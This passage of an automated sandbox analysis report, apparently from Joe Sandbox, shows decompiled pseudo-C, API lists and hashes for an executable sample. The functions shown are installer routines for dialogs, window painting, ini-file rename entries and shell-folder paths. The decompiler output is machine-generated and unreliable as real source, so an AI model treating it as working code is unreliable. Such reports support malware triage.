						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040438A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42375c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004040CB;
				E00403FB7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403FB7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403FEC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f90 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f544 =  *0x41f544 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420560 =  *0x420560 & 0x00000000;
				return 0;
			}

















                                                  0x0040410f
                                                  0x00404235
                                                  0x00404291
                                                  0x00404295
                                                  0x0040436c
                                                  0x0040436e
                                                  0x0040436e
                                                  0x00404374
                                                  0x00404374
                                                  0x00404377
                                                  0x00000000
                                                  0x0040437e
                                                  0x004042a3
                                                  0x004042a5
                                                  0x004042af
                                                  0x004042ba
                                                  0x004042bd
                                                  0x004042c0
                                                  0x004042cb
                                                  0x004042ce
                                                  0x004042d5
                                                  0x004042e3
                                                  0x004042fb
                                                  0x00404303
                                                  0x0040430e
                                                  0x0040431e
                                                  0x00404320
                                                  0x00404320
                                                  0x004042d5
                                                  0x0040432a
                                                  0x00000000
                                                  0x00404335
                                                  0x00404339
                                                  0x0040434a
                                                  0x0040434a
                                                  0x00404350
                                                  0x0040435e
                                                  0x0040435e
                                                  0x00000000
                                                  0x00404362
                                                  0x0040432a
                                                  0x00404240
                                                  0x00000000
                                                  0x00404254
                                                  0x0040425a
                                                  0x00404260
                                                  0x00000000
                                                  0x00000000
                                                  0x00404285
                                                  0x00404287
                                                  0x0040428c
                                                  0x00000000
                                                  0x0040428c
                                                  0x00404240
                                                  0x00404115
                                                  0x00404118
                                                  0x0040411d
                                                  0x0040412e
                                                  0x0040412e
                                                  0x00404135
                                                  0x00404138
                                                  0x0040413a
                                                  0x0040413f
                                                  0x00404148
                                                  0x0040414e
                                                  0x0040415a
                                                  0x0040415d
                                                  0x00404166
                                                  0x0040416b
                                                  0x0040416e
                                                  0x00404173
                                                  0x0040418a
                                                  0x00404191
                                                  0x004041a4
                                                  0x004041a7
                                                  0x004041bc
                                                  0x004041c3
                                                  0x004041c8
                                                  0x004041cd
                                                  0x004041cd
                                                  0x004041dc
                                                  0x004041eb
                                                  0x004041ed
                                                  0x00404203
                                                  0x00404212
                                                  0x00404214
                                                  0x00000000

                                                  APIs
                                                  • CheckDlgButton.USER32 ref: 0040418A
                                                  • GetDlgItem.USER32 ref: 0040419E
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041BC
                                                  • GetSysColor.USER32(?), ref: 004041CD
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041DC
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041EB
                                                  • lstrlenA.KERNEL32(?), ref: 004041F5
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404203
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404212
                                                  • GetDlgItem.USER32 ref: 00404275
                                                  • SendMessageA.USER32(00000000), ref: 00404278
                                                  • GetDlgItem.USER32 ref: 004042A3
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042E3
                                                  • LoadCursorA.USER32 ref: 004042F2
                                                  • SetCursor.USER32(00000000), ref: 004042FB
                                                  • ShellExecuteA.SHELL32(0000070B,open, /B,00000000,00000000,00000001), ref: 0040430E
                                                  • LoadCursorA.USER32 ref: 0040431B
                                                  • SetCursor.USER32(00000000), ref: 0040431E
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040434A
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040435E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: /B$N$open
                                                  • API String ID: 3615053054-636633259
                                                  • Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                  • Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
                                                  • Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                  • Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f90;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f88;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                  0x0040100a
                                                  0x00401039
                                                  0x00401047
                                                  0x0040104d
                                                  0x00401051
                                                  0x0040105b
                                                  0x00401061
                                                  0x00401064
                                                  0x004010f3
                                                  0x00401089
                                                  0x0040108c
                                                  0x004010a6
                                                  0x004010bd
                                                  0x004010cc
                                                  0x004010cf
                                                  0x004010d5
                                                  0x004010d9
                                                  0x004010e4
                                                  0x004010ed
                                                  0x004010ef
                                                  0x004010ef
                                                  0x00401100
                                                  0x00401105
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401112
                                                  0x00401118
                                                  0x0040111f
                                                  0x00401126
                                                  0x00401130
                                                  0x00401142
                                                  0x00401156
                                                  0x00401160
                                                  0x00401165
                                                  0x00401165
                                                  0x00401110
                                                  0x0040116e
                                                  0x00000000
                                                  0x00401178
                                                  0x00401010
                                                  0x00401013
                                                  0x00401015
                                                  0x0040101f
                                                  0x0040101f
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00423780,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                  • Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
                                                  • Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                  • Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405A49 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00405A49(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00406087(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x424010 =  *0x424010 + 1;
						return _t20;
					}
				}
				 *0x422710 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
						_t56 = _t55 + 0x10;
						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)( *0x423f90 + 0x128)));
						_t20 = E004059D2(0x422188, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405947(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405947(_t26 + 0xa, 0x409424);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405993(_t51 + _t29, 0x421d88, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405CFB(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004059D2(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                  0x00405a4f
                                                  0x00405a56
                                                  0x00405a5a
                                                  0x00405a63
                                                  0x00405a67
                                                  0x00405ba6
                                                  0x00405ba6
                                                  0x00000000
                                                  0x00405ba6
                                                  0x00405a67
                                                  0x00405a73
                                                  0x00405a89
                                                  0x00405ab1
                                                  0x00405abc
                                                  0x00405ac0
                                                  0x00405ae0
                                                  0x00405ae7
                                                  0x00405af1
                                                  0x00405afe
                                                  0x00405b03
                                                  0x00405b08
                                                  0x00405b0c
                                                  0x00000000
                                                  0x00000000
                                                  0x00405b1b
                                                  0x00405b1d
                                                  0x00405b2a
                                                  0x00405b2e
                                                  0x00405b9f
                                                  0x00405ba0
                                                  0x00000000
                                                  0x00405b4a
                                                  0x00405b57
                                                  0x00405bbc
                                                  0x00405bc3
                                                  0x00405b6a
                                                  0x00405b6a
                                                  0x00405b6c
                                                  0x00405b75
                                                  0x00405b80
                                                  0x00405b92
                                                  0x00405b99
                                                  0x00000000
                                                  0x00405b99
                                                  0x00405bc5
                                                  0x00405bc6
                                                  0x00405bcb
                                                  0x00405bcd
                                                  0x00405bda
                                                  0x00405bda
                                                  0x00405bde
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405bcf
                                                  0x00405bcf
                                                  0x00405bd2
                                                  0x00405bd5
                                                  0x00405bd6
                                                  0x00000000
                                                  0x00405bcf
                                                  0x00405b62
                                                  0x00405b67
                                                  0x00000000
                                                  0x00405b67
                                                  0x00405b2e
                                                  0x00405a8b
                                                  0x00405a96
                                                  0x00405a9f
                                                  0x00405aa3
                                                  0x00000000
                                                  0x00000000
                                                  0x00405aa3
                                                  0x00405bb0

                                                  APIs
                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
                                                  • GetShortPathNameA.KERNEL32 ref: 00405A9F
                                                  • GetShortPathNameA.KERNEL32 ref: 00405ABC
                                                  • wsprintfA.USER32 ref: 00405ADA
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
                                                  • GlobalFree.KERNEL32 ref: 00405B99
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0
                                                    • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                    • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 3445103937-1727408572
                                                  • Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                  • Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
                                                  • Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                  • Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405D1D Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42375c - 4 + _t36 * 4);
				}
				_t74 =  *0x423fb8 + _t36;
				_t37 = 0x422f20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422f20;
				if(_a4 - 0x422f20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422f20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405C59(_t86,  *0x423f88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405F5D(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x424004;
						if( *0x424004 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f84;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405D1D(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405CFB(_a4, _t37);
			}




























                                                  0x00405d1d
                                                  0x00405d1d
                                                  0x00405d1d
                                                  0x00405d23
                                                  0x00405d28
                                                  0x00405d39
                                                  0x00405d39
                                                  0x00405d44
                                                  0x00405d46
                                                  0x00405d4b
                                                  0x00405d4e
                                                  0x00405d4f
                                                  0x00405d56
                                                  0x00405d58
                                                  0x00405d5e
                                                  0x00405d61
                                                  0x00405d61
                                                  0x00405f3a
                                                  0x00405f3a
                                                  0x00405f3e
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d6e
                                                  0x00405d74
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d7a
                                                  0x00405d7b
                                                  0x00405d7e
                                                  0x00405d81
                                                  0x00405f2d
                                                  0x00405f37
                                                  0x00405f39
                                                  0x00405f39
                                                  0x00405f2f
                                                  0x00405f31
                                                  0x00405f33
                                                  0x00405f34
                                                  0x00405f34
                                                  0x00000000
                                                  0x00405f2d
                                                  0x00405d87
                                                  0x00405d8b
                                                  0x00405d9b
                                                  0x00405d9f
                                                  0x00405da6
                                                  0x00405da9
                                                  0x00405dad
                                                  0x00405db3
                                                  0x00405db6
                                                  0x00405db9
                                                  0x00405dbc
                                                  0x00405ed7
                                                  0x00405eda
                                                  0x00405f0a
                                                  0x00405f0d
                                                  0x00405f12
                                                  0x00405f16
                                                  0x00405f16
                                                  0x00405f1b
                                                  0x00405f1c
                                                  0x00405f21
                                                  0x00405f24
                                                  0x00405f26
                                                  0x00000000
                                                  0x00405f26
                                                  0x00405edc
                                                  0x00405edf
                                                  0x00405ef4
                                                  0x00405efb
                                                  0x00405ee1
                                                  0x00405ee8
                                                  0x00405ee8
                                                  0x00405f03
                                                  0x00405f06
                                                  0x00405ecf
                                                  0x00405ed0
                                                  0x00405ed0
                                                  0x00000000
                                                  0x00405f06
                                                  0x00405dc4
                                                  0x00405dc5
                                                  0x00405dcb
                                                  0x00405dcd
                                                  0x00405de7
                                                  0x00405de7
                                                  0x00405dee
                                                  0x00405dee
                                                  0x00405df5
                                                  0x00405df9
                                                  0x00405df9
                                                  0x00405dfa
                                                  0x00405dfc
                                                  0x00405e35
                                                  0x00405e38
                                                  0x00405e48
                                                  0x00405e4b
                                                  0x00405e53
                                                  0x00405e59
                                                  0x00405e59
                                                  0x00405eb5
                                                  0x00405eb5
                                                  0x00405eb7
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e5d
                                                  0x00405e64
                                                  0x00405e65
                                                  0x00405e67
                                                  0x00405e81
                                                  0x00405e8f
                                                  0x00405e95
                                                  0x00405e97
                                                  0x00405eb2
                                                  0x00405eb2
                                                  0x00405eb2
                                                  0x00000000
                                                  0x00405eb2
                                                  0x00405e9d
                                                  0x00405ea8
                                                  0x00405eae
                                                  0x00405eb0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405eb0
                                                  0x00405e69
                                                  0x00405e6c
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e7b
                                                  0x00405e7d
                                                  0x00405e7f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e7f
                                                  0x00000000
                                                  0x00405eb5
                                                  0x00405e40
                                                  0x00000000
                                                  0x00405dfe
                                                  0x00405e03
                                                  0x00405e19
                                                  0x00405e1e
                                                  0x00405e21
                                                  0x00405ebe
                                                  0x00405ebe
                                                  0x00405ec2
                                                  0x00405eca
                                                  0x00405eca
                                                  0x00000000
                                                  0x00405ec2
                                                  0x00405e2b
                                                  0x00405eb9
                                                  0x00405eb9
                                                  0x00405ebc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405ebc
                                                  0x00405dfc
                                                  0x00405dcf
                                                  0x00405dd3
                                                  0x00000000
                                                  0x00000000
                                                  0x00405dd5
                                                  0x00405dd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00405ddb
                                                  0x00405ddf
                                                  0x00000000
